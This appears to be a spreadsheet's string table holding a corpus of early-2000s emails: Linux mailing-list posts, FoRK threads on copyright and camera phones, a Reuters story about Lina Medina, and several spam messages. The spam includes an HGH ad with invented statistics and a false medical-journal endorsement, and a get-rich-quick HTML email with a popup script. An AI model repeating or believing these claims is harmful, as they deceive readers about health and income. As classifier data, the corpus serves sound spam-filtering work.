 ght=3D600 border=3D0&gt;&lt;/a&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/table&gt;
 =09=09=09&lt;!-- SKYSCRAPER TABLE END --&gt;
 =09=09=09
 =09=09=09
 =09=09=09
 =09=09&lt;/TD&gt;
 =09&lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;!-- CONTENT AND SKYSCRAPER AD TABLE END --&gt;
 &lt;a href=3D"http://www.partner2profit.com/redir.cfm?ccode=3DAFEBB3C4&amp;pcode=
 =3DEF39755C" target=3D"_blank"&gt;&lt;img src=3D"http://www.flowgo.com/images/bt/=
 p2p.gif?ccode=3DAFEBB3C4&amp;pcode=3DEF39755C" width=3D"120" height=3D"600" bor=
 der=3D"0"&gt;&lt;/a&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 &lt;IMG HEIGHT=3D1 WIDTH=3D1 SRC=3D"http://ummail4.unitedmedia.com:80/Click?q=
 =3D0c-_Y5Dnu8oFvp-J66JkEcT7JgF"&gt;
 --20377789.1027333481921.JavaMail.root.umsan1--
</t>
  </si>
  <si>
    <t xml:space="preserve">Shane Ryan asked:
 &gt; ...but maybe there is general interest in
 &gt; an Irish distro.
 I have my own thoughts on this, and would be very keen to create yet another
 new (and different) distro.
 Of course, it would require a minimum of EUR300,000 in funding, which is the
 reason I have not started this project myself... :(
 - Matthew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</si>
  <si>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Once upon a time, Peter wrote :
 &gt; I started wondering how does apt react when it finds a newer kernel in
 &gt; the bunch of "to be updated" files?
 It skips it. See the /etc/apt/apt.conf file for this.
 &gt; And has anyone ever tried to do a dist-upgrade, say from 7.1 to 7.2? 
 &gt; Should it work? If not, why?
 I've done a dist-upgrade from 7.2 to a quite broken rawhide release... it
 was a mess, still, it went much faster and smoother than if I had done it
 "manually" with rpm -U or -F. I think that updates between stable releases
 should still be done with the installer since IIRC, sometimes a few
 twitches are done by anaconda to migrate configurations to new formats. It
 should work though... I still prefer backuping config files and
 reinstalling a clean system when I have the time.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</si>
  <si>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As seen on NBC, CBS, CNN, and even Oprah! The health 
 discovery that actually reverses aging while burning fat, 
 without dieting or exercise! This proven discovery has even 
 been reported on by the New England Journal of Medicine. 
 Forget  aging and dieting forever! And it's Guaranteed!   
 Click here:
 http://66.231.133.205/hgh/index.html 
 Would you like to lose weight while you sleep!
 No dieting!
 No hunger pains!
 No Cravings!
 No strenuous exercise!
 Change your life forever! 
 100% GUARANTEED!
 1.Body Fat Loss            82% improvement.
 2.Wrinkle Reduction     61% improvement.
 3.Energy Level              84% improvement.
 4.Muscle Strength         88% improvement.
 5.Sexual Potency         75% improvement.
 6.Emotional Stability      67% improvement.
 7.Memory                      62% improvement.
 ***********************************************************
 You are receiving this email as a subscriber
 to the Opt-In America Mailing List. 
 To unsubscribe from future offers,
 just click here:
 mailto:affiliateoptout@btamail.net.cn?Subject=off
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Easy Summer Income
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- saved from url=(0022)http://internet.e-mail --&gt;
 &lt;html&gt;
 &lt;SCRIPT&gt;
 browserVer=parseInt(navigator.appVersion); 
 HB=window.open('http://61.129.68.32/empires/ghi.html','HBback','toolbar=no,menubar=no,status=no,directories=no,location=no,scrollbars=no,resizable=no,width=468,height=120' );
 if(browserVer&gt;=4){ 
 window.focus(); 
 }
 &lt;/SCRIPT&gt;
 	&lt;head&gt;
 		&lt;title&gt;Internet Empires&lt;/title&gt;
 	&lt;/head&gt;
 	&lt;body bgcolor="#4682b4"&gt;
 		&lt;div align="center"&gt;
 			&lt;table border="0" cellpadding="0" cellspacing="0" width="465" bgcolor="white"&gt;
 				&lt;tr height="5"&gt;
 					&lt;td width="220" height="5"&gt;&lt;/td&gt;
 					&lt;td width="15" height="5"&gt;&lt;/td&gt;
 					&lt;td width="230" height="5"&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr&gt;
 					&lt;td width="220"&gt;
 						&lt;table border="0" cellpadding="0" cellspacing="0" width="214"&gt;
 							&lt;tr height="19"&gt;
 								&lt;td height="19" width="15"&gt;&lt;/td&gt;
 								&lt;td height="19" width="208"&gt;
 									&lt;div align="center"&gt;
 										&lt;font face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" size="2"&gt;Take Control of your&lt;/font&gt;&lt;/div&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr height="5"&gt;
 								&lt;td height="5" width="15"&gt;&lt;/td&gt;
 								&lt;td height="5" width="208"&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr height="19"&gt;
 								&lt;td height="19" width="15"&gt;&lt;/td&gt;
 								&lt;td height="19" width="208"&gt;
 									&lt;div align="center"&gt;
 										&lt;font face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" color="#0000cd" size="4"&gt;FINANCIAL FUTURE&lt;/font&gt;&lt;/div&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr height="5"&gt;
 								&lt;td height="5" width="15"&gt;&lt;/td&gt;
 								&lt;td height="5" width="208"&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr height="19"&gt;
 								&lt;td height="19" width="15"&gt;&lt;/td&gt;
 								&lt;td height="19" width="208"&gt;
 									&lt;div align="center"&gt;
 										&lt;font face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" size="3"&gt;Make&lt;/font&gt;&lt;font face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" size="2"&gt; &lt;/font&gt;&lt;font face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" size="6" color="navy"&gt;$7,000&lt;/font&gt;&lt;font face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" size="2"&gt; &lt;/font&gt;&lt;font face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" size="3"&gt;/ Month&lt;/font&gt;&lt;/div&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr height="19"&gt;
 								&lt;td height="19" width="15"&gt;&lt;/td&gt;
 								&lt;td height="19" width="208"&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr height="19"&gt;
 								&lt;td height="19" width="15"&gt;&lt;/td&gt;
 								&lt;td height="19" width="208"&gt;
 									&lt;div align="center"&gt;
 										&lt;font size="2" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;&lt;i&gt;Learn how to get. . .&lt;/i&gt;&lt;/font&gt;&lt;/div&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr height="19"&gt;
 								&lt;td height="19" width="15"&gt;&lt;/td&gt;
 								&lt;td height="19" width="208"&gt;
 									&lt;div align="center"&gt;
 										&lt;font size="5" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" color="#8b0000"&gt;5 Money-Making &lt;/font&gt;&lt;/div&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr height="19"&gt;
 								&lt;td height="19" width="15"&gt;&lt;/td&gt;
 								&lt;td height="19" width="208"&gt;
 									&lt;div align="center"&gt;
 										&lt;font size="5" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" color="#8b0000"&gt;Web Sites&lt;/font&gt;&lt;/div&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 						&lt;/table&gt;
 					&lt;/td&gt;
 					&lt;td width="15"&gt;&lt;/td&gt;
       &lt;td width="230"&gt;&lt;a href="http://61.129.68.32/empires/index.php?Aff=11"&gt;&lt;img src="http://61.129.68.32/empires/email/woman001.jpg" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr height="15"&gt;
 					&lt;td height="15" colspan="3"&gt;
 					&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr height="19"&gt;
 					&lt;td height="19" colspan="3"&gt;
 						&lt;div align="center"&gt;
 							&lt;table border="0" cellpadding="0" cellspacing="0" width="410"&gt;
 								&lt;tr&gt;
 									&lt;td&gt;
 										&lt;hr&gt;
 									&lt;/td&gt;
 								&lt;/tr&gt;
 								&lt;tr&gt;
 									&lt;td&gt;&lt;/td&gt;
 								&lt;/tr&gt;
 								&lt;tr height="20"&gt;
 									&lt;td height="20"&gt;&lt;font face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" size="2"&gt;Dear Friend,&lt;/font&gt;
 										&lt;p&gt;&lt;font face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" size="2"&gt;You're about to discover how you can have FIVE of your own Internet businesses set up and taking orders within 29 minutes...for less than half of what most people spend on groceries!&lt;/font&gt;&lt;/p&gt;
 										&lt;p&gt;&lt;font face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" size="2"&gt;But first, please let me introduce myself... &lt;/font&gt;&lt;/p&gt;
 										&lt;p&gt;&lt;font face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" size="2"&gt;Hi! My name is Frank Kern. I'd like for you to know up front that I'm not an Internet Guru...Not A Computer Wiz...And Not A Marketing Genius. &lt;/font&gt;&lt;/p&gt;
 										&lt;p&gt;&lt;font face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" size="2"&gt;First of all, I'll admit that I don't expect you to believe a single word I say. &lt;/font&gt;&lt;/p&gt;
 										&lt;p&gt;&lt;font face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" size="2"&gt;After all, how many times a day are you BOMBARDED with some &amp;quot;get-rich-quick&amp;quot; scheme on the Internet?&lt;/font&gt;&lt;/p&gt;
 										&lt;p&gt;&lt;font face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" size="2"&gt;You probably get a brand new promise of instant wealth every few hours in your e-mail box and if you're anything like me, you've tried a few and been left with nothing but a hole in your pocket!&lt;/font&gt;&lt;/p&gt;
 										&lt;p&gt;&lt;font face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" size="2"&gt;Well, I've got great news for you. &lt;/font&gt;&lt;/p&gt;
 									&lt;/td&gt;
 								&lt;/tr&gt;
 								&lt;tr height="20"&gt;
 									&lt;td height="20"&gt;&lt;/td&gt;
 								&lt;/tr&gt;
 								&lt;tr height="20"&gt;
 									&lt;td height="20"&gt;&lt;font size="2" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"&gt;My unprofessional, little &amp;quot;Home Made&amp;quot; web site brought in $115,467.21 last year and you're about to discover how. . . &lt;/font&gt;&lt;/td&gt;
 								&lt;/tr&gt;
 								&lt;tr height="20"&gt;
 									&lt;td height="20"&gt;&lt;/td&gt;
 								&lt;/tr&gt;
 								&lt;tr height="20"&gt;
 									&lt;td height="20"&gt;
 										&lt;div align="center"&gt;
 											&lt;p&gt;&lt;b&gt;&lt;font size="3"&gt;. . . &lt;/font&gt;&lt;font face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" size="3"&gt;&lt;i&gt;you can do the same!&lt;/i&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 										&lt;/div&gt;
 									&lt;/td&gt;
 								&lt;/tr&gt;
 								&lt;tr height="10"&gt;
 									&lt;td height="10"&gt;&lt;/td&gt;
 								&lt;/tr&gt;
 								&lt;tr height="20"&gt;
 									&lt;td height="20"&gt;
 										&lt;hr&gt;
 									&lt;/td&gt;
 								&lt;/tr&gt;
 								&lt;tr height="10"&gt;
 									&lt;td height="10"&gt;&lt;/td&gt;
 								&lt;/tr&gt;
 								&lt;tr&gt;
 									&lt;td&gt;
 										&lt;div align="center"&gt;
                   &lt;p&gt;&lt;font color="#00008b" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular" size="4"&gt;&lt;a href="http://61.129.68.32/empires/index.php?Aff=11"&gt;Click 
                     Here For Federally Documented Proof&lt;/a&gt;&lt;br&gt;
 												&lt;/font&gt;&lt;/p&gt;
 										&lt;/div&gt;
 									&lt;/td&gt;
 								&lt;/tr&gt;
 							&lt;/table&gt;
 						&lt;/div&gt;
 					&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr height="19"&gt;
 					&lt;td width="220" height="19"&gt;&lt;/td&gt;
 					&lt;td width="15" height="19"&gt;&lt;/td&gt;
 					&lt;td width="230" height="19"&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr height="19"&gt;
 					&lt;td width="220" height="19"&gt;&lt;/td&gt;
 					&lt;td width="15" height="19"&gt;&lt;/td&gt;
 					&lt;td width="230" height="19"&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 			&lt;/table&gt;
 		&lt;/div&gt;
 		&lt;p&gt;&lt;/p&gt;
 	&lt;P align=center&gt;&lt;B&gt;&lt;FONT size=2&gt;&lt;font color="Silver"&gt;This message is coming to you as a result of an Opt-in Relationship our Clients have had with you. &lt;br&gt;If you simply wish to be Removed from all future Messages, 
 then&lt;/FONT&gt;&lt;FONT color=#ff0000&gt; &lt;A href="http://61.129.68.32/empires/remove/remove.html"&gt;CLICK 
 HERE&lt;/A&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;&lt;/BODY&gt;&lt;/HTML&gt;
  [TG0BK5NKIYs5]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Two questions
</t>
  </si>
  <si>
    <t xml:space="preserve">Maybe I'm just blind, but I've been poking through the
 archives of this list trying to find 1) what
 up-to-date KDE3 repositories are available and 2)
 where all the Xine skins went.
 Anybody?
 __________________________________________________
 Do You Yahoo!?
 Yahoo! Health - Feel better, live better
 http://health.yahoo.com
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Got me a crappy laptop
</t>
  </si>
  <si>
    <t xml:space="preserve">Hey,
 I has just been given an old Toshiba CS100 with earliest pentium and 400mb
 of HD but only a floppy drive on it, its got Win3.1 which is funny to see
 again but gonna be cleared as soon as i stop messing with it. What I was
 wondering was could anyone advise what O/S would be good for this, I want a
 small usable *nix distro for it that i can transfer to it fom floppy.
 Connecting this to Winblows&gt;i know that winblows allows pier-to-pier
 connections over serial and parellel ports to other winblows but is this
 easy do for connecting winblows to *nix???
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">At 01:12 AM 8/24/02 -0700, Adam L. Beberg wrote:
 &gt;If the creator didnt say you could have it without paying, it's theft, so
 &gt;simple, hell that's even in all the major holy books.
 In which world are we talking about?  That may be true for the first sale, 
 but once something is out in the world, the "creator" loses control... If I 
 buy a chair you built, and then decide to give it away to my neighbor, by 
 you're definition, he just stole from you.
 &gt;Fair use needs to be clarified a bit and then I hope they start locking
 &gt;people up. How else do i ever have hope of finding a job working for someone
 &gt;that makes things people are supposed to ... *drumroll* pay for.
 Why is it that people don't understand that giving stuff away is a 
 perfectly acceptable tactic in capitalist businesses?  In many places, it's 
 called "advertising": "buy one, get one free", "free shipping on any order 
 over $25", "buy this couch, and get a coffee table for free", "free popcorn 
 with any movie rental", "free doorprize to the first 100 people who enter", 
 "the author will be signing books (for free) at such and such bookstore".
 Access to free stuff often helps to sell other stuff.  Just because you 
 (and the entertainment industry, it seems) can't be creative enough to come 
 up with a business model to leverage free stuff into paid stuff... don't 
 take it out on the rest of us.
 Mike
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">i agree with rob. i think if the phones (and mms is building traction in europe in handsets), this might be interesting. bottom line is will it a) help sell phones and b) bill enough time on the wcarriers networks?
 anyone remember the polariod photo sticker fad? low quality, small in size. but kids totally dug that stuff. seems like every adolescent girl had that stuff at one point. and it never replaced or aimed to replace digital cameras or normal photographs. i don't think mms photos will be a substitute for other photography - developed at the local 1 hour joint or digital photos on your pc. i think it expands the market and forms a new category. the extent of the category size is the big question (will it be a fad or will it a sustained market). that's consumer behavior and marketing. but i don't think the technology adoption will follow a substitution of another product on the market (in this case, digital photos or normal photos). europe's the one to watch - more teenagers have wireless phones and if the pricing and marketing is right, they'll figure out what to do with it once the carriers how to figure out how to market it to them.
 -h
 &gt;From: "Rob Shavell" &lt;rob@mobiusvc.com&gt;
 &gt;To: "'Mike Masnick'" &lt;mike@techdirt.com&gt;
 &gt;Cc: &lt;fork@spamassassin.taint.org&gt;
 &gt;Subject: RE: sprint delivers the next big thing??
 &gt;Date: Wed, 21 Aug 2002 01:10:50 -0700
 &gt;
 &gt;right Mike,
 &gt;
 &gt;i will agree to disagree but i take your comments to heart.  my opinion is
 &gt;only that this is one of the last frontiers of communications ('instant
 &gt;show') that we cross easily (though you are right as rain on pricing).  i am
 &gt;mildly amused at the level of skepticism and innatention it is getting.
 &gt;
 &gt;my premise is that the world will change in dramatic and unexpected ways
 &gt;once there are a billion 'eye's' which can instantly share what they see
 &gt;amongst each other.  that doesn't mean that people will stop talking on
 &gt;their phones, or that people will spend more time w/images than voice.  just
 &gt;that it is fundamental.  from news to crime to privacy to dating to family
 &gt;life to bloopers and practical jokes, i believe there will be an explosion
 &gt;of images unleashed specifically by cell phone integrated lenses because of
 &gt;their utter ubiquity that dwarfs all pictures taken in the history of
 &gt;photography by orders of magnitude and in short order. and yes, changes
 &gt;things 'big time'.
 &gt;
 &gt;rgds,
 &gt;rob
 &gt;
 &gt;
 &gt;-----Original Message-----
 &gt;From: Mike Masnick [mailto:mike@techdirt.com]
 &gt;Sent: Tuesday, August 20, 2002 11:58 PM
 &gt;To: Rob Shavell
 &gt;Cc: fork@spamassassin.taint.org
 &gt;Subject: RE: sprint delivers the next big thing??
 &gt;
 &gt;
 &gt;Not to keep harping on this, but...
 &gt;
 &gt;At 11:36 PM 8/20/02 -0700, Rob Shavell wrote:
 &gt;
 &gt;&gt;content: who cares about content?  that no one can think of 'useful'
 &gt;content
 &gt;&gt;is always the business persons mistake. the content is the users
 &gt;&gt;communications.  its anything and everything.  avg person could easily send
 &gt;&gt;half dozen pics to a dozen people a day.  mainly humorous i'd guess. who
 &gt;&gt;cares if content is trivial in nature. picture speaks a thousand words.
 &gt;
 &gt;This does nothing to answer my question.  I *do* care about content.  Hell,
 &gt;if I could be convinced that people would send stupid pics back and forth
 &gt;all day, I'd have a different opinion of this.  I just am not convinced
 &gt;that they will (stupid or not).
 &gt;
 &gt;While a picture may be worth a thousand words (and this is the same
 &gt;argument the guy who works for me made), how many people do you know who
 &gt;communicate by pictures?  Sure, it sounds nice to say that a picture is
 &gt;such an efficient messaging mechanism, but how often do you actually find
 &gt;yourself drawing someone a picture to explain something?
 &gt;
 &gt;I don't buy it.
 &gt;
 &gt;For most messages, text works fine and is the most efficient
 &gt;mechanism.  For some messages, pictures do the job, but I would say not
 &gt;nearly as often as words.  Why do you think Pictionary and Charades and
 &gt;such are games?  Because images are usually not the most efficient way to
 &gt;get a message across.
 &gt;
 &gt;&gt;misc ramblings: i suppose you skeptical forkers would have said the same
 &gt;&gt;thing about '1 hour photo' processing.  trivial, who needs it, i get better
 &gt;&gt;resultion elswhere.  and yet, it had great decentralizing impact - the
 &gt;plant
 &gt;&gt;had to be downsized and pushed to the retail operation - the digital
 &gt;camera,
 &gt;&gt;and finally the integrated digital camera phone brings this cycle of
 &gt;&gt;decentralization in photography to a logical conclusion (which will put the
 &gt;&gt;photo giants to bed) and change the world in a meaningful way.  also, SMS
 &gt;&gt;didn't take off because its easy, it took off because it costs less.  its
 &gt;&gt;greatly ironic the carriers often trumpet the 'profitabilty' of their SMS
 &gt;&gt;traffic over others because of its ratio of cost to bandwidth.  in reality,
 &gt;&gt;SMS cannibilizes the voice rev's they bought their networks to handle.
 &gt;
 &gt;Again, this is the same argument my colleague made (along with "you just
 &gt;don't understand kids today, and they'll run with this").  I wasn't saying
 &gt;that MMS wouldn't take off because it wasn't high quality or that it wasn't
 &gt;easy.  I was saying that I couldn't see why people would use it in a way
 &gt;that "changed the face of communications".
 &gt;
 &gt;I'm looking for the compelling reason (even if it's a stupid one) why
 &gt;people would want to do this.  Sure, if they integrate cameras into the
 &gt;phone, and the quality improves (even only marginally) I can certainly see
 &gt;people taking pictures with their cameras and occasionally sending them to
 &gt;other people.  But, mostly, I don't see what the benefit is to this over
 &gt;sending them to someone's email address, or putting together an online (or
 &gt;offline) photoalbum.
 &gt;
 &gt;I don't think 1 hour photos are trivial.  People want to see their own pics
 &gt;right away, and the quality is plenty good enough for snapshots.  That's
 &gt;one of the main reasons why digital cameras are catching on.  The instant
 &gt;view part.  I'm guessing your argument is that people not only want
 &gt;"instant view", but also "instant show".  Which is what this service
 &gt;offers.  I'm not convinced that most people want "instant show".  I think
 &gt;people like to package their pictures and show them.  That's why people put
 &gt;together fancy albums, and sit there and force you to go through them while
 &gt;they explain every picture.  Sure, occasionally "instant show" is nice, but
 &gt;it's just "nice" on occasion.  I still can't see how it becomes a integral
 &gt;messaging method.
 &gt;
 &gt;What's the specific benefit of taking a picture and immediately sending it
 &gt;from one phone to another?  There has to be *some* benefit, even if it's
 &gt;silly if people are going to flock to it.
 &gt;
 &gt;I'm searching... no one has given me a straight answer yet.
 &gt;
 &gt;The *only* really intriguing idea I've heard about things like MMS lately
 &gt;are Dan Gillmor's assertion that one day in the near future some news event
 &gt;will happen, and a bunch of people will snap pictures with their mobile
 &gt;phones, from all different angles, and those photos tell the real story of
 &gt;what happened - before the press even gets there.
 &gt;
 &gt;Willing to be proven wrong,
 &gt;Mike
 &gt;
 &gt;PS If the wireless carriers continue to price these services as stupidly as
 &gt;they currently are, then MMS is *never* going to catch on.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Undeliverable                  JPTJ
</t>
  </si>
  <si>
    <t xml:space="preserve">
 ----- Original Message -----
 From: "Luis Villa" &lt;louie@ximian.com&gt;
 &gt;
 &gt; They were the ruling class of a feudal, farming society for quite some
 &gt; time; I believe there were more than a few issues there. Certainly, not
 &gt; everyone in Tibet is as excited about the Dalai Lama as Hollywood
 &gt; appears to be. [Not that the Chinese are much better rights-wise, but
 &gt; they've actually built roads and such, which led to the creation of
 &gt; merchant classes and the like that never existed under the Tibetans.]
 And it's not /going/ to exist under the Tibetans, because it'll be owned and
 operated by Chinese nationals.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Compensation for World's youngest mother
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.cnn.com/2002/WORLD/americas/08/26/peru.mother.reut/index.html
 LIMA, Peru (Reuters) -- Lina Medina's parents thought their 5-year-old daughter had a huge abdominal tumor and when shamans in their remote village in Peru's Andes could find no cure, her father carried her to hospital. 
 Just over a month later, she gave birth to a boy. 
 Aged 5 years, seven months and 21 days old when her child was born by Caesarean section in May 1939, Medina made medical history, and is still the youngest known mother in the world. 
 At the time, Peru's government promised aid that never materialized. Six decades on, Medina lives with her husband in a cramped house in a poor, crime-ridden district of the Peruvian capital known as "Little Chicago." 
 Now 68, she keeps herself to herself and has long refused requests to rake up the past. Gerardo, the son she delivered while still a child herself, died in 1979 at the age of 40. 
 But a new book, written by an obstetrician who has been interested in her case, has drawn fresh attention to Medina's story, and raised the prospect that the Peruvian government may belatedly offer her financial and other assistance. 
 "The government condemned them to live in poverty. In any other country, they would be the objects of special care," Jose Sandoval, author of "Mother Aged 5," told Reuters. 
 "We still have time to repair the damage done to her. That's my fundamental objective," he added. 
 'Totally willing to help'
 Sandoval has raised Medina's case with the office of first lady Eliane Karp, and has asked the government to grant her a life pension -- something officials say is possible. 
 "We're totally willing to help her," said spokeswoman Marta Castaneda. But Suni Ramos, of the social action department of Karp's office, said that before the government could grant her a pension or any other of the aid it was already planning -- such as kitchen and other household equipment -- it needed to talk to her to discuss what she wanted and needed. It is currently trying to contact Medina and her family. 
 Medina's husband, Raul Jurado, told Reuters his wife remained skeptical. "She got no help (in 1939) that I know about," he said. "She thinks governments never deliver. Maybe today there will be a promise that will never come true." 
 Jurado said his wife, whose story is a medical textbook classic and whose case is confirmed as true by such bodies as the American College of Obstetricians and Gynecologists, had turned down Reuters' request for an interview. 
 Medical rarity
 No one has ever established who was the father of Medina's child, or confirmed she became pregnant after being raped. 
 One of nine children born to country folk in Ticrapo, an Andean village at an altitude of 7,400 feet (2,250 meters) in Peru's poorest province, Medina is believed to be the youngest case of precocious puberty in history, Sandoval said. 
 He said she had her first period at 2 1/2, became pregnant aged 4 years and eight months and that when doctors performed the Caesarean to deliver her baby, they found she already had fully mature sexual organs. 
 Her swelling stomach worried her parents. "They thought it was a tumor," he said. But shamans ruled out village superstitions -- including one in which locals believed a snake grew inside a person until it killed them -- and recommended they take her to hospital in the nearest big town, Pisco. 
 There came the staggering diagnosis that she was pregnant. 
 Her father was jailed temporarily on suspicion of incest -- he was later released for lack of evidence -- and doctors, police and even a film crew set off for her village for preliminary investigations into her case. 
 Sandoval, who based his book on media and other published information, and some interviews with relatives as Medina herself declined to comment, said news of the child mother-to-be drew instant offers of aid, including one worth $5,000 from a U.S. businessman, which was turned down. 
 More offers followed after Medina was transferred to a Lima hospital, where her fully developed 6-pound (2.7 kg) baby was born on May 14, 1939 -- Mother's Day. 
 One offer was worth $1,000 a week, plus expenses, for Medina and her baby to be exhibited at the World's Fair in New York. Another, from a U.S. business that the family accepted in early June 1939, was for the pair to travel to the United States for scientists to study the case. The offer included setting up a fund to ensure their lifelong financial comfort. 
 But within days, the state trumped all previous offers, decreeing that Medina and her baby were in "moral danger," and resolving to set up a special commission to protect them. 
 But Sandoval said: "It abandoned the case after six months ...It did absolutely nothing for them." 
 Happy ending?
 Though physically mature, Medina -- who Sandoval said was mentally normal and showed no other unusual medical symptoms -- still behaved like a child, preferring to play with her dolls instead of the new baby, who was fed by a wet nurse. 
 Medina stayed in hospital for 11 months, finally returning to her family after it began legal proceedings that led to a Supreme Court ruling allowing her to live with them again. 
 After taunting from schoolmates, Gerardo -- who was named after one of the doctors who attended Medina and became their mentor -- discovered when he was 10 that the woman he had grown up believing to be his sister was in fact his mother. 
 He died in 1979 from a disease that attacks the body's bone marrow, but Sandoval said it was not clear there was any link with his illness and the fact his mother had been so young. 
 Medina married and in 1972 had a second son, 33 years after her first. Her second child now lives in Mexico. 
 She appears to have turned her bizarre story into a taboo subject. "We just want to get on with our lives, that's it," said Jurado, adding he thought "absolutely nothing" of the fact his wife was the world's youngest mother. 
 He said the couple's main concern now, if the government's offer of aid was genuine, was to be granted the value of a property that belonged to Medina and which the then-government expropriated more than two decades ago. That house has now been destroyed and there is a road on the site. 
 He said its value was "more or less $25,000" and settling the property question would conclude a long legal battle to get back a home of their own -- they live now in a modest house, accessed down a dingy alley half blocked by a wooden board, in a tough neighborhood known to locals as a thieves' paradise. 
 "If the government really wants to help...they should give us the value of our property," he said. 
 As for Sandoval, he said he was optimistic that Medina's story, which he has studied since his student days, would turn out well. "I believe there will be a happy ending," he said. 
 "As a result of the war, corporations have now been enthroned and an era
 of corruption in high places will follow and the money-power of the
 country will endeavor to prolong its reign by working upon the
 prejudices of the people until the wealth is aggregated in a few hands
 and the Republic is destroyed."
 Abraham Lincoln (Nov 21, 1864 in a letter to Col. William F Elkins)
 [Non-text portions of this message have been removed]
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: storage bits
</t>
  </si>
  <si>
    <t xml:space="preserve">At 12:32 PM 12/28/00 -0600, Adam Rifkin wrote:
 &gt;I repeat, IBM 76.8Gb ultra dma/100 hard drive at Fry's for $375...
 &gt;"home of fast, friendly courteous service! (R)"
 &gt;
 &gt;I kid you not.  That's a half a cent a Megabyte for storage.
 &gt;Not El Cheapo storage but top of the line storage.
 less than two years later, we have 320 GB for the same price:
 http://www.shareholder.com/maxtor/news/20020909-89588.cfm
 Maxtor Driving Capacity-Centric Enterprise Apps With "Super-Sized" ATA Drives
 Maxtor Continues its Leadership in the Market it Pioneered with a New 
 Category of High-Density ATA Drives
 MILPITAS, Calif., September 9, 2002-
 Maxtor Corporation (NYSE: MXO), a worldwide leader in hard disk drives and 
 data storage solutions, today announced Maxtor MaXLineTM, its newest 
 generation of ATA drives designed specifically for rapidly emerging 
 enterprise storage applications including near-line, media storage and 
 network storage. The MaXLine family features two critical differentiators: 
 huge capacities up to 320 GB for corporate archiving and media recording; 
 and unique manufacturing and quality for 24/7 operations with mean time to 
 failure (MTTF) rates exceeding one million hours.
 The MaXLine family is designed to bring hard disk drives into "near-line" 
 archive applications. By adding a layer of MaXLine drives to archive 
 architectures, companies can instantly recover time-critical data including 
 executive e-mail, transaction data and accounting data that may need to be 
 recovered on demand.
 These new drives are designed to solve another enterprise problem with the 
 storage of video, media and audio conference call files. Even compressed, 
 these files take up tremendous amounts of high-cost server space. Priced 
 starting around $299.95 to $399.95 MSRP, Maxtor's MaXLine family offers 
 high capacity drives for enterprise applications at price points between 
 traditional ATA and SCSI drives.
 For system OEMs and white box builders, MaXLine offers high-density, 
 easy-to-integrate storage for use in entry-level and mid-size server 
 environments.
 "The demand for instant recall of archived data is expanding as companies 
 are meeting their obligations to quickly access executive e-mails, 
 financial documents and transaction records," said Mike Dooley, senior 
 director of marketing for the Desktop Products Group at Maxtor. "Users may 
 not need to access information in these applications on a daily basis, but 
 when they do need access, it must be instant. Recent advances in ATA 
 technology and our manufacturing processes allow us to build upon our 
